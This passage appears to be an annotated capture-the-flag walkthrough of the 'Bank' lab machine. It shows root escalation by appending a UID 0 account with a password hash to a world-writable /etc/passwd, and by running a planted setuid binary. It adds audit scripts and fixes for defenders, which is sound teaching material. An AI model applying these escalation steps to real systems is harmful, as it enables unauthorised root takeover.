
Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Fri Jun 16 07:44:56 2017
root@bank:~#
This sequence escalates to root by appending a new UID 0 account to the writable /etc/passwd and then logging in as it. Step by step:
Generating a hash:
openssl passwd -1 'P@ssword1!' produces an MD5-crypt hash ($1$...), a legacy format that this Ubuntu 14.04 system still accepts. Quoting the password matters in an interactive shell, where ! would trigger history expansion.
Appending the entry:
echo ... >> /etc/passwd adds tyla:<hash>:0:0:gotcha:/root:/bin/bash. The fields are user name, password, UID 0, GID 0, GECOS comment, home directory and shell. Placing the hash directly in the second field works because the login code only consults /etc/shadow when that field holds the marker x; here there is no shadow entry at all, and none is needed.
Verifying:
cat /etc/passwd shows the new line at the end of the file.
Logging in:
ssh tyla@bank.htb with P@ssword1! succeeds and the prompt already reads root@bank. The name shows as root because UID 0 maps back to the first passwd entry with that UID, which is root's; the kernel only ever sees the number.
The root cause is a single permission bit on /etc/passwd (chmod 644 /etc/passwd is the fix), compounded by PermitRootLogin yes, which allowed a password login for a UID 0 account in the first place. Both are the kind of drift that a periodic file-permission and sshd_config audit catches.
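The defender's side of this: a world-writable /etc/passwd and a second UID 0 account are both trivial to spot. This added shell example (my own, not from the write-up) checks a passwd file's mode bits and flags extra UID 0 entries and password hashes stored in passwd rather than in shadow. The sample content is constructed from the write-up's planted line plus three ordinary entries; the function names are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit a passwd file for the misconfiguration exploited above.
# SAMPLE_PASSWD is constructed: three ordinary entries plus the planted line from the write-up.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
chris:x:1000:1000:chris,,,:/home/chris:/bin/bash
tyla:$1$pwkb5t.S$NoHDeEhSIZke0vni9akQK0:0:0:gotcha:/root:/bin/bash'

# Read passwd lines on stdin; print one finding per line.
#   extra-uid0      a UID 0 account other than root (any UID 0 login is root, whatever its name)
#   hash-in-passwd  a real hash in field 2 instead of the shadow marker "x" (or a locked "*"/"!")
#   malformed       not the seven colon-separated fields that login and sshd expect
audit_passwd() {
    awk -F: '
        NF != 7                 { printf "malformed: %s\n", $0; next }
        $3 == 0 && $1 != "root" { printf "extra-uid0: %s\n", $1 }
        $2 != "x" && $2 != "*" && $2 != "!" && $2 != "" { printf "hash-in-passwd: %s\n", $1 }
    '
}

# Succeeds if the file mode has the other-write bit set (the rw-rw-rw- seen on the box).
# Reads the ls -l mode string rather than stat, whose flags differ between GNU and BSD.
world_writable() {
    case "$(ls -ld "$1" | cut -c1-10)" in
        ????????w?) return 0 ;;
        *)          return 1 ;;
    esac
}

printf '%s\n' "$SAMPLE_PASSWD" | audit_passwd
```

On a live system: world_writable /etc/passwd && echo "passwd is world-writable"; audit_passwd < /etc/passwd. Remediation is chmod 644 /etc/passwd, removal of the planted entry, and the same review of /etc/shadow (mode 640, owner root, group shadow).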
SUID
# check the file type; it is a setuid 32-bit ELF binary
$ file /var/htb/bin/emergency
/var/htb/bin/emergency: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=1fff1896e5f8db5be4db7b7ebab6ee176129b399, stripped
-------------------------------------------------------------------------------
# now simply execute the binary and see what happens: you are root
$ /var/htb/bin/emergency
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
whoami
root
These commands identify and run the custom SUID binary found earlier. Step by step:
Checking the file type:
file reports a setuid, stripped, dynamically linked 32-bit ELF for i386 (the login banner earlier showed an i686 kernel, so a 32-bit userland is expected). Stripped means no symbol table, which would make reversing harder if it were needed.
Executing it:
Running /var/htb/bin/emergency drops straight into a shell. id shows uid=33(www-data) but euid=0(root): the program did not call setuid(0), so only the effective UID is root. That is enough for full root file access, and whoami reports root because it looks at the effective UID.
The write-up runs the binary blind, which is fine in a lab. On a real target, inspect an unknown SUID binary first (file, strings, a look at what it executes) because it may have side effects, and record that you did so. The fix is the usual one: no custom setuid-root binaries in odd locations. If an emergency escalation path is really needed, a narrowly scoped sudo rule is auditable and revocable; a setuid bit is neither.
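Running an unknown SUID root binary blind is fine in a lab; on an engagement you first want to know which entries are not part of the distribution. This added shell example (mine, not from the write-up) triages find output the two ways that made /var/htb/bin/emergency obvious: by location outside the package-managed prefixes, and by difference against a baseline. The baseline here is an assumption constructed from the listing above with the suspicious entry removed, not an official Ubuntu 14.04 reference; on a real job capture it from a clean install of the same release.

```shell
#!/bin/sh
# Added example: triage `find / -perm -u=s -type f` output.
# SAMPLE_SUID is the listing from the write-up; BASELINE is an assumed clean list
# (the same listing without the planted binary), not an official Ubuntu 14.04 reference.
SAMPLE_SUID='/var/htb/bin/emergency
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/bin/ping
/bin/ping6
/bin/su
/bin/fusermount
/bin/mount
/bin/umount'

BASELINE=$(printf '%s\n' "$SAMPLE_SUID" | grep -v '^/var/htb/bin/emergency$')

# Prefixes where package-managed setuid binaries normally live.
STANDARD_PREFIXES='/usr/bin/ /usr/sbin/ /usr/lib/ /usr/libexec/ /bin/ /sbin/ /lib/'

# Print SUID paths that are not under any standard prefix (e.g. /var, /opt, /home, /tmp).
suid_outside_standard_paths() {
    awk -v prefixes="$STANDARD_PREFIXES" '
        BEGIN { n = split(prefixes, p, " ") }
        {
            known = 0
            for (i = 1; i <= n; i++) if (index($0, p[i]) == 1) known = 1
            if (!known) print
        }'
}

# Print SUID paths on stdin that are absent from the newline-separated baseline in $1.
suid_not_in_baseline() {
    awk -v base="$1" '
        BEGIN { n = split(base, b, "\n"); for (i = 1; i <= n; i++) seen[b[i]] = 1 }
        !($0 in seen)'
}

printf '%s\n' "$SAMPLE_SUID" | suid_outside_standard_paths
printf '%s\n' "$SAMPLE_SUID" | suid_not_in_baseline "$BASELINE"
```

On the target: find / -perm -u=s -type f 2>/dev/null | suid_outside_standard_paths. The location heuristic needs no prior knowledge and catches the case on this box; the baseline comparison is the stronger check, since a planted binary in /usr/bin would pass the first test and fail the second.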